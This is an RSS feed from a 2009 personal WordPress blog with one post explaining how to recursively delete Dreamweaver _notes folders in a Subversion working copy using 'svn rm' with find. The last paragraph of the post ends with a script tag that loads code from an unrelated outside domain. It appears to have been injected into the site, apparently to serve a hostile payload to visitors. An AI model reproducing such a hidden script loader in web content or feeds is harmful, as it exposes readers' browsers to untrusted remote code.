<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Andy Nelsen &#187; Source Control</title>
	<atom:link href="http://www.andynelsen.com/category/source-control/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.andynelsen.com</link>
	<description>Just another WordPress weblog</description>
	<lastBuildDate>Thu, 19 Nov 2009 19:59:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Recursively delete Dreamweaver _notes directories in Subversion</title>
		<link>http://www.andynelsen.com/2009/11/05/recursively-delete-dreamweaver-_notes-directories-in-subversion/</link>
		<comments>http://www.andynelsen.com/2009/11/05/recursively-delete-dreamweaver-_notes-directories-in-subversion/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 03:36:23 +0000</pubDate>
		<dc:creator>Andy</dc:creator>
				<category><![CDATA[Random Tips]]></category>
		<category><![CDATA[Source Control]]></category>

		<guid isPermaLink="false">http://www.andynelsen.com/?p=3</guid>
		<description><![CDATA[Every once in a while I inherit a site that was built in Dreamweaver. I&#8217;m not anti-DW by any means. I think it has a great code view, and the Find/Replace function is epic for making mass updates to an existing site.
What I DON&#8217;T like is polluting my Subversion repository with old _notes folders generated [...]]]></description>
			<content:encoded><![CDATA[<p>Every once in a while I inherit a site that was built in Dreamweaver. I&#8217;m not anti-DW by any means. I think it has a great code view, and the Find/Replace function is epic for making mass updates to an existing site.</p>
<p>What I DON&#8217;T like is polluting my Subversion repository with old _notes folders generated by DW for template and file synchronization operations. It&#8217;s easy enough to delete all of the folders, but that will cause trouble for you when you try to commit and Subversion can&#8217;t figure out what happened to the files. Worse yet, an update before committing just plops those folders right back in place.</p>
<p>The solution is to use subversion&#8217;s delete function in combination with core shell tools to quickly remove all those files and keep Subversion informed of the changes.</p>
<p>Just cd to the top of your SVN working copy and do:</p>
<pre><code>svn rm  `find . -type d -name _notes` --force</code></pre>
<p>The &#8211;force flag is not necessary unless you have accidentally opened your project in DW to do a quick S&amp;R and find that a bunch of unversioned _notes folders have appeared. Using &#8211;force just makes sure that you get both versioned and unversioned instances without any warnings.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.andynelsen.com/2009/11/05/recursively-delete-dreamweaver-_notes-directories-in-subversion/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
